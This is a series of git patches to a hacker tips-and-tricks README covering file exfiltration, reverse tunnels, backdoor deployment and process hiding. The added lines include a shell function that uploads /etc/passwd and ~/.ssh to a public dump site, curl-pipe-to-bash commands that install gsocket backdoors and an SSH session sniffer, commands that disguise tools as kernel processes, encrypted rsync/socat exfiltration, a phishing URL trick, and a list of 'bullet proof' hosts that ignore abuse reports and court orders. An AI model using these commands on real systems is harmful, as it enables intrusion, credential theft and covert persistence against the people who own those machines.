From 24ce329c2d3c20dbc80a5d60bcb5c9fbbfcc7160 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Wed, 30 Aug 2023 18:40:29 +0100
Subject: [PATCH 01/19] Update README.md

---
 README.md | 1 -
 1 file changed, 1 deletion(-)

diff --git a/README.md b/README.md
index 7d6925e..5ff8244 100644
--- a/README.md
+++ b/README.md
@@ -1634,7 +1634,6 @@ Publishing
 
 Forums and Conferences
 1. [0x00Sec](https://0x00sec.org/) - Reverse Engineering & Hacking with a pinch of Malware
-2. [CyberArsenal](https://cyberarsenal.org/)/[Telegram](https://t.me/pwn3rzs) - Hacker Warez, tools and programs
 3. [AlligatorCon](https://www.alligatorcon.eu/) - the original
 4. [0x41con](https://0x41con.org/)
 5. [TumpiCon](https://tumpicon.org/)

From 4a56635b741c68fbf500e0bc0361af258300bda9 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Wed, 30 Aug 2023 18:43:12 +0100
Subject: [PATCH 02/19] Update README.md

---
 README.md | 1 +
 1 file changed, 1 insertion(+)

diff --git a/README.md b/README.md
index 5ff8244..03926e4 100644
--- a/README.md
+++ b/README.md
@@ -1599,6 +1599,7 @@ Static Binaries / Warez
 
 Phishing
 1. https://github.com/htr-tech/zphisher - We don't hack like this but this is what we would use.
+2. https://da.gd/ - Tinier TinyUrl and allows https://www.google.com-fish-fish@da.gd/blah
 
 Tools
 1. https://github.com/guitmz/ezuri - Obfuscate Linux binaries

From c01eb48cb2c9edfa1e5a6ef1519532bc025455eb Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Wed, 6 Sep 2023 12:12:02 +0100
Subject: [PATCH 03/19] Update README.md

---
 README.md | 12 ++++++------
 1 file changed, 6 insertions(+), 6 deletions(-)

diff --git a/README.md b/README.md
index 03926e4..bec094e 100644
--- a/README.md
+++ b/README.md
@@ -345,19 +345,19 @@ The others configuring server.org:1080 as their SOCKS4/5 proxy. They can now con
 On the host behind NAT: Create a reverse SSH tunnel to [ssh-j.com](http://ssh-j.com) like so:
 ```sh
 ## Cut & Paste on the host behind NAT.
-ssh_j()
+sshj()
 {
    local pw
-   pw=$1
+   pw=${1,,}
    [[ -z $pw ]] && { pw=$(head -c64 </dev/urandom | base64 | tr -d -c a-z0-9); pw=${pw:0:12}; }
    echo "Press Ctrl-C to stop this tunnel."
-   echo -e "To connect to this host: \e[0;36mssh -J ${pw}@ssh-j.com ${USER:-root}@${pw}\e[0m"
+   echo -e "To ssh to ${USER:-root}@${2:-127.0.0.1}:${3:-22} type: \e[0;36mssh -J ${pw}@ssh-j.com ${USER:-root}@${pw}\e[0m"
    ssh -o StrictHostKeyChecking=accept-new -o ServerAliveInterval=30 -o ExitOnForwardFailure=yes ${pw}@ssh-j.com -N -R ${pw}:22:${2:-0}:${3:-22}
 }
 
-ssh_j                                 # Generates a random tunnel ID [e.g. 5dmxf27tl4kx] and keeps the tunnel connected
-ssh_j foobarblahblub                  # Creates tunnel with specific tunnel ID
-ssh_j foobarblahblub 192.168.0.1 2222 # Tunnel to host 192.168.0.1 on port 2222 on the LAN
+sshj                                 # Generates a random tunnel ID [e.g. 5dmxf27tl4kx] and keeps the tunnel connected
+sshj foobarblahblub                  # Creates tunnel to 127.0.0.1:22 with specific tunnel ID
+sshj foobarblahblub 192.168.0.1 2222 # Tunnel to host 192.168.0.1:2222 on the LAN
 ```
 
 Then use this command from anywhere else in the world to connect as 'root' to 'foobarblahblub' (the host behind the NAT):

From 3ff4d1dc200b11f55a09e29ebea7c0ba6024aff0 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Wed, 6 Sep 2023 12:19:02 +0100
Subject: [PATCH 04/19] Update README.md

---
 README.md | 5 +++++
 1 file changed, 5 insertions(+)

diff --git a/README.md b/README.md
index bec094e..d4bdddf 100644
--- a/README.md
+++ b/README.md
@@ -1132,6 +1132,11 @@ or
 bash -c "$(wget --no-check-certificate -qO- https://gsocket.io/x)"
 ```
 
+or deploy gsocket by running their own deployment server:
+```sh
+LOG=results.log bash -c "$(curl -fsSL https://gsocket.io/xs)"
+```
+
 <a id="backdoor-background-reverse-shell"></a>
 **6.i. Background reverse shell**
 

From 59261fd51615b7902f37700336730a3db211e26b Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Wed, 6 Sep 2023 12:19:43 +0100
Subject: [PATCH 05/19] Update README.md

---
 README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/README.md b/README.md
index d4bdddf..246203a 100644
--- a/README.md
+++ b/README.md
@@ -1134,7 +1134,7 @@ bash -c "$(wget --no-check-certificate -qO- https://gsocket.io/x)"
 
 or deploy gsocket by running their own deployment server:
 ```sh
-LOG=results.log bash -c "$(curl -fsSL https://gsocket.io/xs)"
+LOG=results.log bash -c "$(curl -fsSL https://gsocket.io/xs)"  # Notice '/xs' instead of '/x'
 ```
 
 <a id="backdoor-background-reverse-shell"></a>

From d0a8e3bbbfe424996afdd535348b05a3d36b2ee9 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Wed, 6 Sep 2023 12:23:56 +0100
Subject: [PATCH 06/19] Update README.md

---
 README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/README.md b/README.md
index 246203a..0e7dc17 100644
--- a/README.md
+++ b/README.md
@@ -1467,7 +1467,7 @@ The SSH session will be sniffed and logged to *~/.ssh/logs/* the next time the u
 The easiest way is using [https://www.thc.org/ssh-it/](https://www.thc.org/ssh-it/).
 
 ```sh
-bash -c "$(curl -fsSL ssh-it.thc.org/x)"
+bash -c "$(curl -fsSL https://thc.org/ssh-it/x)"
 ```
 
 ---

From 2bbea4a03f90973c407c2554d553b3fef53347bd Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Sun, 10 Sep 2023 19:37:16 +0100
Subject: [PATCH 07/19] Update README.md

---
 README.md | 28 ++++++++++++++++++++++++++--
 1 file changed, 26 insertions(+), 2 deletions(-)

diff --git a/README.md b/README.md
index 0e7dc17..89dca63 100644
--- a/README.md
+++ b/README.md
@@ -41,6 +41,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg)
    1. [File transfer using gs-netcat and sftp](#file-transfer-gs-netcat)
    1. [File transfer using HTTP](#http)
    1. [File transfer without curl](#burl)
+   1. [File transfer for transfer.sh](#trans) 
    1. [File transfer using WebDAV](#webdav)
    1. [File transfer to Telegram](#tg) 
 1. [Reverse Shell / Dumb Shell](#reverse-shell)
@@ -896,8 +897,31 @@ burl() {
 # PORT=31337 burl http://37.120.235.188/blah.tar.gz >blah.tar.gz
 ```
 
+<a id="trans"></a>
+### 4.vii. File transfer using a public dump
+
+Cut & paste into your bash:
+```sh
+transfer() {
+    local fn
+    [[ $# -eq 0 ]] && { echo -e >&2 "Usage:\n    transfer [file/directory]\n    transfer [name] <FILENAME"; return 255; }
+    [[ ! -t 0 ]] && { curl -SsfL --progress-bar --upload-file "-" "https://transfer.sh/${1}"; return; }
+    [[ ! -e "$1" ]] && { echo -e >&2 "Not found: $1"; return 255; }
+    [[ -d "$1" ]] && { (cd "${1}/.."; tar cfz - "${1##*/}")|curl -SsfL --progress-bar --upload-file "-" "https://transfer.sh/${1##*/}.tar.gz"; return; }
+    curl -SsfL --progress-bar --upload-file "$1" "https://transfer.sh/${1##*/}"
+}
+```
+
+then upload a file or a directory:
+```sh
+transfer /etc/passwd  # A single file
+transfer ~/.ssh       # An entire directory
+(curl ipinfo.io; hostname; uname -a; cat /proc/cpuinfo) | transfer "$(hostname)"
+```
+A list of our <A href="?cloudexfil">favorite public upload sites</A>.
+
 <a id="webdav"></a>
-### 4.vii. File transfer - using WebDAV
+### 4.viii. File transfer - using WebDAV
 
 On your workstation (e.g. segfault.net) start a Cloudflare-Tunnel and WebDAV:
 ```sh
@@ -934,7 +958,7 @@ net use * \\example-foo-bar-lights.trycloudflare.com@SSL\sources
 ```
 
 <a id="tg"></a>
-### 4.viii. File transfer to Telegram
+### 4.ix. File transfer to Telegram
 
 There are [zillions of upload services](#cloudexfil) but TG is a neat alternative. Get a _TG-Bot-Token_ from the [TG BotFather](https://www.siteguarding.com/en/how-to-get-telegram-bot-api-token). Then create a new TG group and add your bot to the group. Retrieve the _chat_id_ of that group:
 ```sh

From 0847faade3da3962b10c691288f40b0b4ebfa3f7 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Sun, 10 Sep 2023 19:39:19 +0100
Subject: [PATCH 08/19] Update README.md

---
 README.md | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/README.md b/README.md
index 89dca63..2562b03 100644
--- a/README.md
+++ b/README.md
@@ -41,7 +41,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg)
    1. [File transfer using gs-netcat and sftp](#file-transfer-gs-netcat)
    1. [File transfer using HTTP](#http)
    1. [File transfer without curl](#burl)
-   1. [File transfer for transfer.sh](#trans) 
+   1. [File transfer to public dump sites](#trans) 
    1. [File transfer using WebDAV](#webdav)
    1. [File transfer to Telegram](#tg) 
 1. [Reverse Shell / Dumb Shell](#reverse-shell)
@@ -918,7 +918,7 @@ transfer /etc/passwd  # A single file
 transfer ~/.ssh       # An entire directory
 (curl ipinfo.io; hostname; uname -a; cat /proc/cpuinfo) | transfer "$(hostname)"
 ```
-A list of our <A href="?cloudexfil">favorite public upload sites</A>.
+A list of our [favorite public upload sites](#cloudexfil).
 
 <a id="webdav"></a>
 ### 4.viii. File transfer - using WebDAV

From 7ba167cfe29d4a42acadc5640c0335f3443af229 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Sun, 10 Sep 2023 19:40:17 +0100
Subject: [PATCH 09/19] Update README.md

---
 README.md | 7 +++----
 1 file changed, 3 insertions(+), 4 deletions(-)

diff --git a/README.md b/README.md
index 2562b03..6c6c522 100644
--- a/README.md
+++ b/README.md
@@ -903,12 +903,11 @@ burl() {
 Cut & paste into your bash:
 ```sh
 transfer() {
-    local fn
     [[ $# -eq 0 ]] && { echo -e >&2 "Usage:\n    transfer [file/directory]\n    transfer [name] <FILENAME"; return 255; }
-    [[ ! -t 0 ]] && { curl -SsfL --progress-bar --upload-file "-" "https://transfer.sh/${1}"; return; }
+    [[ ! -t 0 ]] && { curl -SsfL --progress-bar -T "-" "https://transfer.sh/${1}"; return; }
     [[ ! -e "$1" ]] && { echo -e >&2 "Not found: $1"; return 255; }
-    [[ -d "$1" ]] && { (cd "${1}/.."; tar cfz - "${1##*/}")|curl -SsfL --progress-bar --upload-file "-" "https://transfer.sh/${1##*/}.tar.gz"; return; }
-    curl -SsfL --progress-bar --upload-file "$1" "https://transfer.sh/${1##*/}"
+    [[ -d "$1" ]] && { (cd "${1}/.."; tar cfz - "${1##*/}")|curl -SsfL --progress-bar -T "-" "https://transfer.sh/${1##*/}.tar.gz"; return; }
+    curl -SsfL --progress-bar -T "$1" "https://transfer.sh/${1##*/}"
 }
 ```
 

From 5387bb87e4362ae282d05fa02dbb03218015af25 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Sun, 10 Sep 2023 19:43:59 +0100
Subject: [PATCH 10/19] Update README.md

---
 README.md | 9 +++++++++
 1 file changed, 9 insertions(+)

diff --git a/README.md b/README.md
index 6c6c522..bc3cb70 100644
--- a/README.md
+++ b/README.md
@@ -868,6 +868,15 @@ export GSOCKET_ARGS="-s MySecret"                        # Workstation
 sftp -D gs-netcat                                        # Workstation
 ```
 
+Or to DUMP a single file:
+```sh
+# On the sender
+gs-netcat -l <"FILENAME" # Will output a SECRET used by the receiver
+
+# On the receiver
+gs-netcat >"FILENAME"  # When prompted, enter the SECRET from the sender
+```
+
 <a id="http"></a>
 ### 4.v. File transfer - using HTTP
 

From 1770185c438e7ea0d457ac64aa4740237253aa97 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Sat, 16 Sep 2023 09:54:41 +0100
Subject: [PATCH 11/19] Update README.md

---
 README.md | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/README.md b/README.md
index bc3cb70..4a000ae 100644
--- a/README.md
+++ b/README.md
@@ -452,6 +452,8 @@ ssh -R80:0:8080 -o StrictHostKeyChecking=accept-new nokey@localhost.run
 ### Or using remote.moe
 ssh -R80:0:8080 -o StrictHostKeyChecking=accept-new nokey@remote.moe
 ### Or using cloudflared
+curl -fL -o cloudflared https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64
+chmod 755 cloudflared
 cloudflared tunnel --url http://localhost:8080 --no-autoupdate
 ```
 Either tunnel will generate a new HTTPS-URL for you. Use this URL on your workstation (see below). Use [Gost](https://iq.thc.org/tunnel-via-cloudflare-to-any-tcp-service) to tunnel raw TCP over the HTTP(s) link.
@@ -1736,6 +1738,7 @@ rlwrap --always-readline ssh user@host
 <a id="others"></a>
 ## 13. Other Sites
 
+1. [Phineas Fisher](https://blog.isosceles.com/phineas-fisher-hacktivism-and-magic-tricks/) - No nonsense. Direct. How we like it.
 1. [Hacking HackingTeam - a HackBack](https://gist.github.com/jaredsburrows/9e121d2e5f1147ab12a696cf548b90b0) - Old but real talent at work.
 2. [Guacamaya Hackback](https://www.youtube.com/watch?v=5vRIisM0Op4)
 3. [Vx Underground](https://www.vx-underground.org/)

From 53281eb376701563df02773214965b9f17dbc99e Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Sat, 16 Sep 2023 20:25:14 +0100
Subject: [PATCH 12/19] Update README.md

---
 README.md | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/README.md b/README.md
index 4a000ae..ff0c622 100644
--- a/README.md
+++ b/README.md
@@ -1527,8 +1527,9 @@ Trusted VPN Providers
 
 Virtual Private Servers
 1. https://www.hetzner.com - Cheap
+2. https://hivecloud.pw - No KYC. Bullet Proof. Accepts Crypto.
 1. https://dmzhost.co - Ignore most abuse requests
-2. https://alexhost.com - DMCA free zone
+2. https://alexhost.com - No KYC. Bullet Proof. DMCA free zone
 3. https://basehost.eu - Ignores court orders
 4. https://buyvm.net - Warez best friend
 5. https://serverius.net - Used by gangsters

From 2b5787fafcf91d0ef04a8e235279a96561d9a84a Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Sat, 16 Sep 2023 20:43:16 +0100
Subject: [PATCH 13/19] Update README.md

---
 README.md | 20 ++++++++++----------
 1 file changed, 10 insertions(+), 10 deletions(-)

diff --git a/README.md b/README.md
index ff0c622..cc642da 100644
--- a/README.md
+++ b/README.md
@@ -12,7 +12,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg)
 1. [Bash](#bash)
    1. [Leave Bash without history](#bash-no-history)
    1. [Hide your commands](#bash-hide-command)
-   1. [Hide your arguments](#bash-hide-arguments)
+   1. [Hide your command line options](#zap)
    1. [Hide a network connection](#bash-hide-connection)
    1. [Hide a process as user](#hide-a-process-user)
    1. [Hide a process as root](#hide-a-process-root)
@@ -146,18 +146,18 @@ PATH=.:$PATH syslogd -T0 10.0.2.1/24
 ```
 In this example we execute *nmap* but let it appear with the name *syslogd* in *ps alxwww* process list.
 
-<a id="bash-hide-arguments"></a>
-**1.iii. Hide your arguments**
-
-Download [zap-args.c](https://raw.githubusercontent.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet/master/src/zap-args.c). This example will execute *nmap* but will make it appear as 'syslogd' without any arguments in the *ps alxww* output.
+<a id="zap"></a>
+**1.iii. Hide your command line options**
 
+Use [zapper](https://github.com/hackerschoice/zapper):
 ```sh
-gcc -Wall -O2 -fpic -shared -o zap-args.so zap-args.c -ldl
-(LD_PRELOAD=./zap-args.so exec -a syslogd nmap -T0 10.0.0.1/24)
-### Or as daemon background process:
-(LD_PRELOAD=./zap-args.so exec -a syslogd nmap -T0 10.0.0.1/24 &>nmap.log &)
+# Start Nmap but zap all options and show it as 'klog' in the process list:
+./zapper -a klog nmap -T0 10.0.0.1/24
+# Same but started as a daemon:
+(./zapper -a klog nmap -T0 10.0.0.1/24 &>nmap.log &)
+# Start a tmux and hide tmux and all further processes as some kernel process:
+exec ./zapper -f -a'[kworker/1:0-rcu_gp]' tmux
 ```
-Note: There is a gdb variant as well. Anyone?
 
 <a id="bash-hide-connection"></a>
 **1.iv. Hide a Network Connection**

From 4346778eb16bbe40e046d4e4dd1bf4835c725081 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Sat, 16 Sep 2023 20:46:45 +0100
Subject: [PATCH 14/19] Update README.md

---
 README.md | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/README.md b/README.md
index cc642da..5d0364e 100644
--- a/README.md
+++ b/README.md
@@ -155,7 +155,8 @@ Use [zapper](https://github.com/hackerschoice/zapper):
 ./zapper -a klog nmap -T0 10.0.0.1/24
 # Same but started as a daemon:
 (./zapper -a klog nmap -T0 10.0.0.1/24 &>nmap.log &)
-# Start a tmux and hide tmux and all further processes as some kernel process:
+# Replace the existing shell with tmux (with 'exec').
+# Then start and hide tmux and all further processes - as some kernel process:
 exec ./zapper -f -a'[kworker/1:0-rcu_gp]' tmux
 ```
 

From 328fb8a8968fba0ed60bc4f6bc8e76cd7e9f8c01 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Mon, 18 Sep 2023 11:16:14 +0100
Subject: [PATCH 15/19] Update README.md

---
 README.md | 49 +++++++++++++++++++++++++++++++++++++++++++++----
 1 file changed, 45 insertions(+), 4 deletions(-)

diff --git a/README.md b/README.md
index 5d0364e..195780a 100644
--- a/README.md
+++ b/README.md
@@ -41,6 +41,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg)
    1. [File transfer using gs-netcat and sftp](#file-transfer-gs-netcat)
    1. [File transfer using HTTP](#http)
    1. [File transfer without curl](#burl)
+   2. [File transfer using rsync](#rsync)
    1. [File transfer to public dump sites](#trans) 
    1. [File transfer using WebDAV](#webdav)
    1. [File transfer to Telegram](#tg) 
@@ -931,10 +932,50 @@ transfer ~/.ssh       # An entire directory
 ```
 A list of our [favorite public upload sites](#cloudexfil).
 
-<a id="webdav"></a>
-### 4.viii. File transfer - using WebDAV
+<a id="rsync"></a>
+### 4.viii. File transfer - using rsync
 
-On your workstation (e.g. segfault.net) start a Cloudflare-Tunnel and WebDAV:
+Ideal for synchonizing large amount of directories or re-starting broken transfers. The example transfers the directory '*warez*' to the Receiver using a single TCP connection from the Sender to the Receiver.
+
+Receiver:
+```
+echo -e "[up]\npath=upload\nread only=false\nuid=$(id -u)\ngid=$(id -g)" >r.conf
+mkdir upload
+rsync --daemon --port=31337 --config=r.conf --no-detach
+```
+
+Sender:
+```
+rsync -av warez rsync://1.2.3.4:31337/up
+```
+
+The same encrypted (OpenSSL):
+
+Receiver:
+```
+openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509 -keyout ssl.key -out ssl.crt
+cat ssl.key ssl.crt >ssl.pem
+rm -f ssl.key
+mkdir upload
+socat OPENSSL-LISTEN:31337,reuseaddr,fork,cert=ssl.pem,cafile=ssl.crt EXEC:"rsync --server -logtprR --safe-links --partial upload"
+```
+
+Sender:
+```
+# Copy the ssl.pem and ssl.crt from the Receiver to the Sender:
+# Using rsync + socat-ssl
+rsync -ahPRv -e "bash -c 'socat - OPENSSL-CONNECT:1.2.3.4:31337,cert=ssl.pem,cafile=ssl.crt,verify=0' #" -- warez  0:
+
+# Using rsync + openssl
+rsync -ahPRv -e "bash -c 'openssl s_client -connect 1.2.3.4:31337 -servername thc -cert ssl.pem -CAfile ssl.crt -quiet 2>/dev/null' #" -- warez  0:
+```
+
+(To exfil from Windows, use the rsync.exe from the [gsocket windows package](https://github.com/hackerschoice/binary/raw/main/gsocket/bin/gs-netcat_x86_64-cygwin_full.zip)).
+
+<a id="webdav"></a>
+### 4.ix. File transfer - using WebDAV
+
+On the receiver (e.g. segfault.net) start a Cloudflare-Tunnel and WebDAV:
 ```sh
 cloudflared tunnel --url localhost:8080 &
 # [...]
@@ -969,7 +1010,7 @@ net use * \\example-foo-bar-lights.trycloudflare.com@SSL\sources
 ```
 
 <a id="tg"></a>
-### 4.ix. File transfer to Telegram
+### 4.x. File transfer to Telegram
 
 There are [zillions of upload services](#cloudexfil) but TG is a neat alternative. Get a _TG-Bot-Token_ from the [TG BotFather](https://www.siteguarding.com/en/how-to-get-telegram-bot-api-token). Then create a new TG group and add your bot to the group. Retrieve the _chat_id_ of that group:
 ```sh

From 24850ff45a0afbb74219598ee949b746bf5ee18e Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Mon, 18 Sep 2023 11:26:59 +0100
Subject: [PATCH 16/19] Update README.md

---
 README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/README.md b/README.md
index 195780a..82690d0 100644
--- a/README.md
+++ b/README.md
@@ -970,7 +970,7 @@ rsync -ahPRv -e "bash -c 'socat - OPENSSL-CONNECT:1.2.3.4:31337,cert=ssl.pem,caf
 rsync -ahPRv -e "bash -c 'openssl s_client -connect 1.2.3.4:31337 -servername thc -cert ssl.pem -CAfile ssl.crt -quiet 2>/dev/null' #" -- warez  0:
 ```
 
-(To exfil from Windows, use the rsync.exe from the [gsocket windows package](https://github.com/hackerschoice/binary/raw/main/gsocket/bin/gs-netcat_x86_64-cygwin_full.zip)).
+(To exfil from Windows, use the rsync.exe from the [gsocket windows package](https://github.com/hackerschoice/binary/raw/main/gsocket/bin/gs-netcat_x86_64-cygwin_full.zip)). A noisier solution is [syncthing](https://syncthing.net/).
 
 <a id="webdav"></a>
 ### 4.ix. File transfer - using WebDAV

From 5063139f70f0cf5312a0e6212e3e84762998819e Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Mon, 18 Sep 2023 12:04:43 +0100
Subject: [PATCH 17/19] Update README.md

---
 README.md | 1 +
 1 file changed, 1 insertion(+)

diff --git a/README.md b/README.md
index 82690d0..577a34d 100644
--- a/README.md
+++ b/README.md
@@ -970,6 +970,7 @@ rsync -ahPRv -e "bash -c 'socat - OPENSSL-CONNECT:1.2.3.4:31337,cert=ssl.pem,caf
 rsync -ahPRv -e "bash -c 'openssl s_client -connect 1.2.3.4:31337 -servername thc -cert ssl.pem -CAfile ssl.crt -quiet 2>/dev/null' #" -- warez  0:
 ```
 
+This can be combined with cloudflared to exfil with [rsync over https / cloudflared](https://iq.thc.org/tunnel-via-cloudflare-to-any-tcp-service).  
 (To exfil from Windows, use the rsync.exe from the [gsocket windows package](https://github.com/hackerschoice/binary/raw/main/gsocket/bin/gs-netcat_x86_64-cygwin_full.zip)). A noisier solution is [syncthing](https://syncthing.net/).
 
 <a id="webdav"></a>

From 9bf56e48b7abf7adea2d1ad39202f7f970e8e1d0 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Mon, 18 Sep 2023 12:21:31 +0100
Subject: [PATCH 18/19] Update README.md

---
 README.md | 21 ++++++++++++++++++++-
 1 file changed, 20 insertions(+), 1 deletion(-)

diff --git a/README.md b/README.md
index 577a34d..6f14652 100644
--- a/README.md
+++ b/README.md
@@ -882,8 +882,9 @@ gs-netcat >"FILENAME"  # When prompted, enter the SECRET from the sender
 ```
 
 <a id="http"></a>
-### 4.v. File transfer - using HTTP
+### 4.v. File transfer - using HTTPs
 
+#### Download from Server to Receiver:
 ```sh
 ## Spawn a temporary HTTP server and share the current working directory.
 python -m http.server 8080
@@ -893,6 +894,24 @@ python -m http.server 8080
 ## Request a temporary tunnel on a public domain
 cloudflared tunnel -url localhost:8080
 ```
+Receiver: Access the URL from any browser to view/download the remote file system.
+
+#### Upload from Sender to Receiver:
+```sh
+## Spawn an upload server on the Receiver:
+pip install uploadserver
+python -m uploadserver
+```
+
+```sh
+## Make it available through a public domain
+cloudflared tunnel -url localhost:8000
+```
+
+On the Sender:
+```sh
+curl -X POST  https://CF-URL-CHANGE-ME.trycloudflare.com/upload -F 'files=@myfile.txt'
+```
 
 <a id="burl"></a>
 ### 4.vi. File transfer without curl

From f292755dd32d10f42e227d318469a4a08ff7e4f6 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Mon, 18 Sep 2023 12:37:55 +0100
Subject: [PATCH 19/19] Update README.md

---
 README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/README.md b/README.md
index 6f14652..6ab0517 100644
--- a/README.md
+++ b/README.md
@@ -897,7 +897,7 @@ cloudflared tunnel -url localhost:8080
 Receiver: Access the URL from any browser to view/download the remote file system.
 
 #### Upload from Sender to Receiver:
-```sh
+```
 ## Spawn an upload server on the Receiver:
 pip install uploadserver
 python -m uploadserver